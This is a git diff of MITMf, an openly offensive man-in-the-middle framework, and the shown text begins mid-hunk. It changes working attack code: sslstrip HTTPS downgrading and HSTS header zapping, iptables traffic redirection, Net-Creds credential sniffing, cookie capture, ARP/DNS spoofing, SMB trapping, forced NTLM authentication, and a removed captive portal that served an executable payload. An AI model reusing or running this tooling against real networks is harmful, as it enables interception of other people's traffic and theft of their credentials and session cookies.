445), SMB1) + server2 = ThreadingTCPServer((settings.Config.Bind_To, 139), SMB1) + else: + server1 = ThreadingTCPServer(('', 445), SMB1) + server2 = ThreadingTCPServer(('', 139), SMB1) for server in [server1, server2]: t = threading.Thread(name='SMB', target=server.serve_forever) diff --git a/core/sslstrip/ServerConnection.py b/core/sslstrip/ServerConnection.py index f9a2719..f196842 100644 --- a/core/sslstrip/ServerConnection.py +++ b/core/sslstrip/ServerConnection.py @@ -155,7 +155,7 @@ class ServerConnection(HTTPClient): self.isCompressed = True elif (key.lower()== 'strict-transport-security'): - clientlog.info("Zapped a strict-transport-security header", extra=self.clientInfo) + clientlog.info("Zapped a strict-trasport-security header", extra=self.clientInfo) elif (key.lower() == 'content-length'): self.contentLength = value @@ -179,7 +179,7 @@ class ServerConnection(HTTPClient): self.plugins.hook() if logging.getLevelName(log.getEffectiveLevel()) == "DEBUG": - for header, value in self.headers.iteritems(): + for header, value in self.client.headers.iteritems(): log.debug("Receiving header: ({}: {})".format(header, value)) def handleResponsePart(self, data): diff --git a/core/utils.py b/core/utils.py index 7781bad..c3ae067 100644 --- a/core/utils.py +++ b/core/utils.py @@ -98,5 +98,5 @@ class iptables: def NFQUEUE(self): log.debug("Setting iptables NFQUEUE rule") - os.system('iptables -I FORWARD -j NFQUEUE --queue-num 0') + os.system('iptables -t nat -A PREROUTING -j NFQUEUE --queue-num 1') self.nfqueue = True \ No newline at end of file diff --git a/libs/bdfactory b/libs/bdfactory index d2f3521..dadf1d2 160000 --- a/libs/bdfactory +++ b/libs/bdfactory @@ -1 +1 @@ -Subproject commit d2f352139f23ed642fa174211eddefb95e6a8586 +Subproject commit dadf1d21bfcb9c8ebefc7891bd95b9452b2af8d5 diff --git a/logs/.gitignore b/logs/.gitignore index 364db4d..cf7c24d 100644 --- a/logs/.gitignore +++ b/logs/.gitignore @@ -1,5 +1,5 @@ * !.gitignore 
!responder/ -!dns/ +!dnschef/ !ferret-ng/ diff --git a/logs/dns/.gitignore b/logs/dnschef/.gitignore similarity index 100% rename from logs/dns/.gitignore rename to logs/dnschef/.gitignore diff --git a/mitmf.py b/mitmf.py index 03c7ed3..08a8b73 100755 --- a/mitmf.py +++ b/mitmf.py @@ -41,7 +41,7 @@ mitmf_version = '0.9.8' mitmf_codename = 'The Dark Side' if os.geteuid() != 0: - sys.exit("[-] The derp is strong with this one\nTIP: you may run MITMf as root.") + sys.exit("[-] The derp is strong with this one") parser = argparse.ArgumentParser(description="MITMf v{} - '{}'".format(mitmf_version, mitmf_codename), version="{} - '{}'".format(mitmf_version, mitmf_codename), @@ -52,14 +52,14 @@ parser = argparse.ArgumentParser(description="MITMf v{} - '{}'".format(mitmf_ver #add MITMf options sgroup = parser.add_argument_group("MITMf", "Options for MITMf") sgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="info", help="Specify a log level [default: info]") -sgroup.add_argument("-i", dest='interface', required=True, type=str, help="Interface to listen on") +sgroup.add_argument("-i", dest='interface', type=str, help="Interface to listen on") sgroup.add_argument("-c", dest='configfile', metavar="CONFIG_FILE", type=str, default="./config/mitmf.conf", help="Specify config file to use") sgroup.add_argument("-p", "--preserve-cache", action="store_true", help="Don't kill client/server caching") sgroup.add_argument("-r", '--read-pcap', type=str, help='Parse specified pcap for credentials and exit') sgroup.add_argument("-l", dest='listen_port', type=int, metavar="PORT", default=10000, help="Port to listen on (default 10000)") sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.") sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.") -sgroup.add_argument("-F", "--filter", type=str, help='Filter to apply to incoming traffic', nargs='+') +sgroup.add_argument("-F", "--filter", type=str, help='Filter to apply to incoming traffic') #Initialize plugins and pass them the parser NameSpace object plugins = [plugin(parser) for plugin in plugin.Plugin.__subclasses__()] @@ -73,15 +73,6 @@ options = parser.parse_args() #Set the log level logger().log_level = logging.__dict__[options.log_level.upper()] -from core.logger import logger -formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S") -log = logger().setup_logger("MITMf", formatter) - -from core.netcreds import NetCreds - -if options.read_pcap: - NetCreds().parse_pcap(options.read_pcap) - #Check to see if we supplied a valid interface, pass the IP and MAC to the NameSpace object from core.utils import get_ip, get_mac, shutdown options.ip = get_ip(options.interface) @@ -89,18 +80,33 @@ options.mac = get_mac(options.interface) settings.Config.populate(options) +from core.logger import logger +formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S") +log = logger().setup_logger("MITMf", formatter) + log.debug("MITMf started: {}".format(sys.argv)) #Start Net-Creds -print "[*] MITMf v{} - '{}'".format(mitmf_version, mitmf_codename) - -NetCreds().start(options.interface, options.ip) -print "|" -print "|_ Net-Creds v{} online".format(NetCreds.version) +from core.netcreds import NetCreds +NetCreds().start(options.interface, options.ip, options.read_pcap) +from core.sslstrip.CookieCleaner import CookieCleaner from core.proxyplugins import ProxyPlugins +from core.sslstrip.StrippingProxy 
import StrippingProxy +from core.sslstrip.URLMonitor import URLMonitor + +URLMonitor.getInstance().setFaviconSpoofing(options.favicon) +URLMonitor.getInstance().setCaching(options.preserve_cache) +CookieCleaner.getInstance().setEnabled(options.killsessions) + +strippingFactory = http.HTTPFactory(timeout=10) +strippingFactory.protocol = StrippingProxy + +reactor.listenTCP(options.listen_port, strippingFactory) ProxyPlugins().all_plugins = plugins + +print "[*] MITMf v{} - '{}'".format(mitmf_version, mitmf_codename) for plugin in plugins: #load only the plugins that have been called at the command line @@ -120,64 +126,48 @@ for plugin in plugins: for line in xrange(0, len(plugin.tree_info)): print "| |_ {}".format(plugin.tree_info.pop()) + plugin.reactor(strippingFactory) plugin.start_config_watch() +print "|" +print "|_ Sergio-Proxy v0.2.1 online" +print "|_ SSLstrip v0.9 by Moxie Marlinspike online" +print "|" + if options.filter: from core.packetfilter import PacketFilter pfilter = PacketFilter(options.filter) + pfilter.start() print "|_ PacketFilter online" - for filter in options.filter: - print " |_ Applying filter {} to incoming packets".format(filter) - try: - pfilter.start() - except KeyboardInterrupt: - pfilter.stop() - shutdown() + print "| |_ Applying filter {} to incoming packets".format(options.filter) -else: - from core.sslstrip.CookieCleaner import CookieCleaner - from core.sslstrip.StrippingProxy import StrippingProxy - from core.sslstrip.URLMonitor import URLMonitor +print "|_ Net-Creds v{} online".format(NetCreds.version) - URLMonitor.getInstance().setFaviconSpoofing(options.favicon) - URLMonitor.getInstance().setCaching(options.preserve_cache) - CookieCleaner.getInstance().setEnabled(options.killsessions) +#Start mitmf-api +from core.mitmfapi import mitmfapi +print "|_ MITMf-API online" +mitmfapi().start() - strippingFactory = http.HTTPFactory(timeout=10) - strippingFactory.protocol = StrippingProxy +#Start the HTTP Server +from core.servers.HTTP import HTTP +HTTP().start() +print "|_ HTTP server online" - reactor.listenTCP(options.listen_port, strippingFactory) +#Start DNSChef +from core.servers.DNS import DNSChef +DNSChef().start() +print "|_ DNSChef v{} online".format(DNSChef.version) - for plugin in plugins: - if vars(options)[plugin.optname] is True: - plugin.reactor(strippingFactory) +#Start the SMB server +from core.servers.SMB import SMB +SMB().start() +print "|_ SMB server online\n" - print "|_ Sergio-Proxy v0.2.1 online" - print "|_ SSLstrip v0.9 by Moxie Marlinspike online" +#start the reactor +reactor.run() +print "\n" - #Start mitmf-api - from core.mitmfapi import mitmfapi - print "|" - print "|_ MITMf-API online" - mitmfapi().start() +if options.filter: + pfilter.stop() - #Start the HTTP Server - from core.servers.HTTP import HTTP - HTTP().start() - print "|_ HTTP server online" - - #Start DNSChef - from core.servers.DNS import DNSChef - DNSChef().start() - print "|_ DNSChef v{} online".format(DNSChef.version) - - #Start the SMB server - from core.servers.SMB import SMB - SMB().start() - print "|_ SMB server online\n" - - #start the reactor - reactor.run() - print "\n" - - shutdown() +shutdown() \ No newline at end of file diff --git a/plugins/appcachepoison.py b/plugins/appcachepoison.py index 505c5f6..c456db2 100644 --- a/plugins/appcachepoison.py +++ b/plugins/appcachepoison.py @@ -36,7 +36,6 @@ class AppCachePlugin(Plugin): from core.sslstrip.URLMonitor import URLMonitor self.urlMonitor = URLMonitor.getInstance() - self.urlMonitor.caching = True 
self.urlMonitor.setAppCachePoisoning() def response(self, response, request, data): @@ -73,25 +72,29 @@ class AppCachePlugin(Plugin): p = self.getTemplatePrefix(section) self.clientlog.info("Poisoning raw URL", extra=request.clientInfo) if os.path.exists(p + '.replace'): # replace whole content - with open(p + '.replace', 'r') as f: - data = f.read() + f = open(p + '.replace', 'r') + data = f.read() + f.close() elif os.path.exists(p + '.append'): # append file to body - with open(p + '.append', 'r') as f: - data += f.read() + f = open(p + '.append', 'r') + data += f.read() + f.close() elif (section.get('tamper_url',False) == url) or (section.has_key('tamper_url_match') and re.search(section['tamper_url_match'], url)): self.clientlog.info("Found URL in section '{}'!".format(name), extra=request.clientInfo) p = self.getTemplatePrefix(section) self.clientlog.info("Poisoning URL with tamper template: {}".format(p), extra=request.clientInfo) if os.path.exists(p + '.replace'): # replace whole content - with open(p + '.replace', 'r') as f: - data = f.read() + f = open(p + '.replace', 'r') + data = f.read() + f.close() elif os.path.exists(p + '.append'): # append file to body - with open(p + '.append', 'r') as f: - appendix = f.read() - data = re.sub(re.compile("", re.IGNORECASE), appendix + "", data) #append to body + f = open(p + '.append', 'r') + appendix = f.read() + data = re.sub(re.compile("",re.IGNORECASE), appendix + "", data) #append to body + f.close() # add manifest reference data = re.sub(re.compile(" - -

Please click here if you are not redirected automatically

- - '''.format(self.portalurl) - response.redirect(self.portalurl) - - return {'response': response, 'request':request, 'data': data} - - def options(self, options): - ''' captive can be either run redirecting to a specified url (--portalurl), serve the payload locally (no argument) or - start an instance of SimpleHTTPServer to serve the LOCALDIR (--portaldir) ''' - group = options.add_mutually_exclusive_group(required=False) - group.add_argument('--portalurl', dest='portalurl', metavar="URL", help='Specify the URL where the portal is located, e.g. http://example.com.') - group.add_argument('--portaldir', dest='portaldir', metavar="LOCALDIR", help='Specify a local path containg the portal files served with a SimpleHTTPServer on a different port (see config).') - - options.add_argument('--use-dns', dest='usedns', action='store_true', help='Whether we use dns spoofing to serve from a fancier portal URL captive.portal when used without options or portaldir. Requires DNS for "captive.portal" to resolve, e.g. via configured dns spoofing --dns.') - - def on_shutdown(self): - '''This will be called when shutting down''' - pass - - def serve_portal(self): - - self.portalurl = 'http://{}/portal.html'.format(self.hostname) - - from core.servers.HTTP import HTTP - HTTP.add_static_endpoint('portal.html','text/html', './config/captive/portal.html') - HTTP.add_static_endpoint('CaptiveClient.exe','application/octet-stream', self.config['Captive']['PayloadFilename']) - self.tree_info.append("Portal login served by built-in HTTP server.") - - - def serve_dir(self, dir): - import threading - import posixpath - import urllib - import os - from SimpleHTTPServer import SimpleHTTPRequestHandler - from BaseHTTPServer import HTTPServer as ServerClass - Protocol = "HTTP/1.0" - port = self.config['Captive']['Port'] - ServerString = self.config['Captive']['ServerString'] - - self.portalurl = "http://{}:{}/".format(self.hostname, port) - - ROUTES = (['', dir],) - class HandlerClass(SimpleHTTPRequestHandler): - '''HandlerClass adapted from https://gist.github.com/creativeaura/5546779''' - - def translate_path(self, path): - '''translate path given routes''' - - # set default root to cwd - root = os.getcwd() - - # look up routes and set root directory accordingly - for pattern, rootdir in ROUTES: - if path.startswith(pattern): - # found match! 
- path = path[len(pattern):] # consume path up to pattern len - root = rootdir - break - - # normalize path and prepend root directory - path = path.split('?',1)[0] - path = path.split('#',1)[0] - path = posixpath.normpath(urllib.unquote(path)) - words = path.split('/') - words = filter(None, words) - - path = root - for word in words: - drive, word = os.path.splitdrive(word) - head, word = os.path.split(word) - if word in (os.curdir, os.pardir): - continue - path = os.path.join(path, word) - - return path - - - server_address = ('0.0.0.0', int(port)) - HandlerClass.protocol_version = Protocol - HandlerClass.server_version = ServerString - - httpd = ServerClass(server_address, HandlerClass) - ServerClass.path = dir - - sa = httpd.socket.getsockname() - try: - t = threading.Thread(name='PortalServer', target=httpd.serve_forever) - t.setDaemon(True) - t.start() - self.tree_info.append("Portal Server instance running on port {} serving {}".format(port, dir)) - except Exception as e: - shutdown("Failed to start Portal Server") diff --git a/plugins/ferretng.py b/plugins/ferretng.py index fbe7e7d..2bdfbf7 100644 --- a/plugins/ferretng.py +++ b/plugins/ferretng.py @@ -45,6 +45,7 @@ class FerretNG(Plugin): with open(options.cookie_file, 'r') as cookie_file: self.cookie_file = json.dumps(cookie_file.read()) URLMonitor.getInstance().cookies = self.cookie_file + cookie_file.close() except Exception as e: shutdown("[-] Error loading cookie log file: {}".format(e)) @@ -93,3 +94,4 @@ class FerretNG(Plugin): self.log.info("Writing cookies to log file") with open('./logs/ferret-ng/cookies-{}.log'.format(datetime.now().strftime("%Y-%m-%d_%H:%M:%S:%s")), 'w') as cookie_file: cookie_file.write(str(URLMonitor.getInstance().cookies)) + cookie_file.close() diff --git a/plugins/filepwn.py b/plugins/filepwn.py index 571d5ed..83d947c 100644 --- a/plugins/filepwn.py +++ b/plugins/filepwn.py @@ -611,14 +611,14 @@ class FilePwn(Plugin): def response(self, response, request, data): - content_header = response.responseHeaders.getRawHeaders('Content-Type')[0] + content_header = response.headers['content-type'] client_ip = request.client.getClientIP() host = request.headers['host'] - if not response.responseHeaders.hasHeader('content-length'): - content_length = None - else: - content_length = int(response.responseHeaders.getRawHeaders('content-length')[0]) + try: + content_length = int(response.headers['content-length']) + except KeyError: + content_length = None for target in self.user_config['targets'].keys(): if target == 'ALL': diff --git a/plugins/imagerandomizer.py b/plugins/imagerandomizer.py deleted file mode 100644 index 268123a..0000000 --- a/plugins/imagerandomizer.py +++ /dev/null @@ -1,57 +0,0 @@ -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. 
-# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# - -import random -import os -from plugins.plugin import Plugin - -class ImageRandomizer(Plugin): - name = "ImageRandomizer" - optname = "imgrand" - desc = 'Replaces images with a random one from a specified directory' - version = "0.1" - - def initialize(self, options): - self.options = options - self.img_dir = options.img_dir - - def responseheaders(self, response, request): - '''Kill the image skipping that's in place for speed reasons''' - if request.isImageRequest: - request.isImageRequest = False - request.isImage = True - self.imageType = response.responseHeaders.getRawHeaders('content-type')[0].split('/')[1].upper() - - def response(self, response, request, data): - try: - isImage = getattr(request, 'isImage') - except AttributeError: - isImage = False - - if isImage: - try: - img = random.choice(os.listdir(self.options.img_dir)) - with open(os.path.join(self.options.img_dir, img), 'rb') as img_file: - data = img_file.read() - self.clientlog.info("Replaced image with {}".format(img), extra=request.clientInfo) - return {'response': response, 'request': request, 'data': data} - except Exception as e: - self.clientlog.info("Error: {}".format(e), extra=request.clientInfo) - - def options(self, options): - options.add_argument("--img-dir", type=str, metavar="DIRECTORY", help="Directory with images") \ No newline at end of file diff --git a/plugins/inject.py b/plugins/inject.py index b71218c..27bda03 100644 --- a/plugins/inject.py +++ b/plugins/inject.py @@ -61,13 +61,10 @@ class Inject(Plugin): ip = response.getClientIP() hn = response.getRequestHostname() - if not response.responseHeaders.hasHeader('Content-Type'): - return {'response': response, 'request':request, 'data': data} - - mime = response.responseHeaders.getRawHeaders('Content-Type')[0] - - if "text/html" not in mime: - return {'response': response, 'request':request, 'data': data} + try: + mime = response.headers['Content-Type'] + except KeyError: + return if "charset" in mime: match = re.search('charset=(.*)', mime) diff --git a/plugins/plugin.py b/plugins/plugin.py index c90d01f..f42efd6 100644 --- a/plugins/plugin.py +++ b/plugins/plugin.py @@ -31,7 +31,6 @@ class Plugin(ConfigWatcher): def __init__(self, parser): '''Passed the options namespace''' - if self.desc: sgroup = parser.add_argument_group(self.name, self.desc) else: diff --git a/plugins/replace.py b/plugins/replace.py index d5339b2..47e5f9f 100644 --- a/plugins/replace.py +++ b/plugins/replace.py @@ -35,7 +35,7 @@ class Replace(Plugin): self.options = options def response(self, response, request, data): - mime = response.responseHeaders.getRawHeaders('Content-Type')[0] + mime = response.headers['Content-Type'] hn = response.getRequestHostname() if "text/html" in mime: diff --git a/plugins/responder.py b/plugins/responder.py index 2f36be3..983a904 100644 --- a/plugins/responder.py +++ b/plugins/responder.py @@ -91,5 +91,5 @@ class Responder(Plugin): options.add_argument('--fingerprint', dest="finger", action="store_true", help="Fingerprint hosts that issued an NBT-NS or LLMNR query") options.add_argument('--lm', dest="lm", action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier") options.add_argument('--wpad', dest="wpad", action="store_true", help="Start the WPAD rogue proxy server") - 
options.add_argument('--forcewpadauth', dest="forcewpadauth", action="store_true", help="Force NTLM/Basic authentication on wpad.dat file retrieval (might cause a login prompt)") - options.add_argument('--basic', dest="basic", action="store_true", help="Return a Basic HTTP authentication. If not set, an NTLM authentication will be returned") + options.add_argument('--forcewpadauth', dest="forcewpadauth", action="store_true", help="Set this if you want to force NTLM/Basic authentication on wpad.dat file retrieval. This might cause a login prompt in some specific cases. Therefore, default value is False") + options.add_argument('--basic', dest="basic", action="store_true", help="Set this if you want to return a Basic HTTP authentication. If not set, an NTLM authentication will be returned") diff --git a/plugins/screenshotter.py b/plugins/screenshotter.py index a8a3806..cd69328 100644 --- a/plugins/screenshotter.py +++ b/plugins/screenshotter.py @@ -46,6 +46,7 @@ class ScreenShotter(Inject, Plugin): try: with open('./logs/' + img_file, 'wb') as img: img.write(base64.b64decode(urllib.unquote(request.postData).decode('utf8').split(',')[1])) + img.close() self.clientlog.info('Saved screenshot to {}'.format(img_file), extra=request.clientInfo) except Exception as e: diff --git a/plugins/smbtrap.py b/plugins/smbtrap.py index 8e8ca03..ceec87f 100644 --- a/plugins/smbtrap.py +++ b/plugins/smbtrap.py @@ -33,6 +33,6 @@ class SMBTrap(Plugin): return {"request": request, "version": version, "code": 302, "message": "Found"} def responseheaders(self, response, request): - self.clientlog.info("Trapping request to {}".format(request.headers['host']), extra=request.clientInfo) + self.clientlog.info("Trapping request to {}".format(request.headers['host'])) rand_path = ''.join(random.sample(string.ascii_uppercase + string.digits, 8)) - response.responseHeaders.setRawHeaders('Location', ["file://{}/{}".format(self.ip, rand_path)]) + response.headers["Location"] = "file://{}/{}".format(self.ip, rand_path) diff --git a/plugins/spoof.py b/plugins/spoof.py index dafe4b1..0d6f46b 100644 --- a/plugins/spoof.py +++ b/plugins/spoof.py @@ -70,7 +70,7 @@ class Spoof(Plugin): if options.dns: self.tree_info.append('DNS spoofing enabled') - if iptables().dns is False and options.filter is None: + if iptables().dns is False: iptables().DNS(self.config['MITMf']['DNS']['port']) if not options.arp and not options.icmp and not options.dhcp and not options.dns: @@ -78,7 +78,7 @@ class Spoof(Plugin): set_ip_forwarding(1) - if iptables().http is False and options.filter is None: + if iptables().http is False: iptables().HTTP(options.listen_port) for protocol in self.protocol_instances: @@ -96,7 +96,7 @@ class Spoof(Plugin): options.add_argument('--gatewaymac', dest='gatewaymac', help='Specify the gateway MAC [will auto resolve if ommited]') options.add_argument('--targets', dest='targets', help='Specify host/s to poison [if ommited will default to subnet]') options.add_argument('--ignore', dest='ignore', help='Specify host/s not to poison') - options.add_argument('--arpmode', type=str, dest='arpmode', default='rep', choices=["rep", "req"], help='ARP Spoofing mode: replies (rep) or requests (req) [default: rep]') + options.add_argument('--arpmode',type=str, dest='arpmode', default='rep', choices=["rep", "req"], help=' ARP Spoofing mode: replies (rep) or requests (req) [default: rep]') def on_shutdown(self): from core.utils import iptables, set_ip_forwarding diff --git a/plugins/sslstrip+.py b/plugins/sslstrip+.py index 
9266040..109e721 100644 --- a/plugins/sslstrip+.py +++ b/plugins/sslstrip+.py @@ -33,7 +33,7 @@ class SSLstripPlus(Plugin): from core.servers.DNS import DNSChef from core.utils import iptables - if iptables().dns is False and options.filter is False: + if iptables().dns is False: iptables().DNS(self.config['MITMf']['DNS']['port']) URLMonitor.getInstance().setHstsBypass() diff --git a/plugins/upsidedownternet.py b/plugins/upsidedownternet.py index a293dd1..71579b9 100644 --- a/plugins/upsidedownternet.py +++ b/plugins/upsidedownternet.py @@ -34,7 +34,7 @@ class Upsidedownternet(Plugin): if request.isImageRequest: request.isImageRequest = False request.isImage = True - self.imageType = response.responseHeaders.getRawHeaders('content-type')[0].split('/')[1].upper() + self.imageType = response.headers['content-type'].split('/')[1].upper() def response(self, response, request, data): try: diff --git a/requirements.txt b/requirements.txt index b0dce5a..e1c67d1 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,4 +1,4 @@ -git+https://github.com/kti/python-netfilterqueue +git+git://github.com/kti/python-netfilterqueue pyinotify pycrypto pyasn1 @@ -23,4 +23,4 @@ python-magic msgpack-python requests pypcap -chardet +chardet \ No newline at end of file diff --git a/setup.sh b/setup.sh new file mode 100755 index 0000000..3c8052a --- /dev/null +++ b/setup.sh @@ -0,0 +1,3 @@ +#!/usr/bin/env bash + +git submodule init && git submodule update --recursive \ No newline at end of file diff --git a/tests/basic_tests.py b/tests/basic_tests.py index 155a3d7..5b68896 100644 --- a/tests/basic_tests.py +++ b/tests/basic_tests.py @@ -24,7 +24,7 @@ class BasicTests(unittest.TestCase): from core.logger import logger logger.log_level = logging.DEBUG from core.netcreds import NetCreds - NetCreds().start('venet0:0', '172.30.96.18') + NetCreds().start('venet0:0', '172.30.96.18', None) def test_SSLStrip_Proxy(self): favicon = True